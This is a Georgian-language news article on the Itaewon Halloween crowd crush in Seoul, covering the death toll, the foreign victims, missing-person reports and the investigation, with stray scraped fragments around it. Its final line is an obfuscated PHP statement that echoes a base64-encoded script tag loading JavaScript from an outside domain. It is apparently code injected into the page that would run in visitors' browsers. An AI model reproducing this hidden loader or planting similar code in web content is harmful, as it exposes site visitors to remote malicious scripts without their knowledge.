celsiusi
ავერსი საქკაბელი
სამხრეთ კორეის დედაქალაქ სეულში, იტევონის რაიონში ჰელოუინის დღესასწაულზე მომხდარის შედეგად ბოლო მონაცემებით, 153 ადამიანი დაიღუპა, ათობით ადამიანი დაშავდა, პოლიციამ კი განცხადება 4,024 ადამიანის დაკარგვის შესახებ მიიღო.
 
რა გახდა მასობრივი ჭყლეტის მიზეზი ჯერჯერობით უცნობია. მომხდარზე დაწყებულია გამოძიება.
 
იტევონის რაიონი ჰელოუინის აღსანიშნად უკვე წლებია პოპულარული ადგილია. დღესასწაულის აღსანიშნად სეულში რეგიონის სხვა ქვეყნებიდანაც კი ჩადიან. ბოლო ორი წლის განმავლობაში, პანდემიის გამო, დღესასწაულს არ აღნიშნავდნენ, შაბათი საღამო კი ამ პერიოდის განმავლობაში პირველი ჰელოუინი იყო, რაც ქვეყანამ კორონავირუსის გამო დაწესებული შეზღუდვები გააუქმა. 
 
ადგილზე სასტუმროები და ბილეთები წინასწარ იყო დაჯავშნილი, შესაბამისად დიდი რაოდენობის ხალხი მოსალოდნელი იყო.
 
CNN თვითმხილველებზე დაყრდნობით წერს, რომ მასობრივ ჭყლეტამდე ადგილზე ხალხის მასის კონტროლი შესაბამისად არ ხდებოდა.
 
სოციალურ ქსელებში გავრცელებულ ვიდეოებსა და ფოტოებზე ჩანან ადამიანები, რომლებიც ვიწრო ქუჩაზე ერთად დგანან.
 
ერთ-ერთი თვითმხილველის თქმით, ხალხს იმის გასაგებად, რომ ადგილზე რაღაც ხდებოდა, გარკვეული დრო დასჭირდა. 
 
სასწრაფო დახმარებაში პირველი ზარი ადგილობრივი დროით საღამოს 10:24 საათზე შევიდა. სასწრაფო ადგილზე მალევე მივიდა, თუმცა ხალხის დიდი რაოდენობა ართულებდა მისვლას იმ ადამიანებთან, ვისაც დახმარება სჭირდებოდა.
 
სოციალურ ქსელებში გავრცელებულ ვიდეოში ჩანს, რომ სასწრაფოს მისვლამდე ადამიანებს პირველად დახმარებას ადგილზე მყოფები უწევდნენ.
 
შემთხვევის გამომწვევ მიზეზებზე გამოძიება კვლავ მიმდინარეობს, თუმცა ოფიციალური პირების თქმით, ადგილზე გაზის გაჟონვა ან ხანძარი არ ყოფილა.
 
ოფიციალური ინფორმაციით, დაღუპულთა შორის უმეტესობა თინეიჯერი ან 20 წლამდე ახალგაზრდაა. 
 
150-ზე მეტი გარდაცვლილიდან 19 უცხო ქვეყნის მოქალაქეა, მათ შორის ირანიდან, ნორვეგიიდან, ჩინეთიდან, ტაილანდიდან და უზბეკეთიდან.
 
სამხრეთ კორეის შინაგან საქმეთა მინისტრის თქმით, გარდაცვლილთა 90% უკვე იდენტიფიცირებულია. მანვე აღნიშნა, რომ დაახლოებით 10 ადამიანის იდენტიფიცირება ვერ ხერხდება, რადგან რამდენიმე მათგანი არასრულწლოვანია, რომლებსაც პირადობა არ ჰქონდა.
 
ამ დროისთვის ცნობილია, რომ სეულის პოლიციამ დაკარგული ადამიანების შესახებ 4 024 განცხადება მიიღო.
418
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");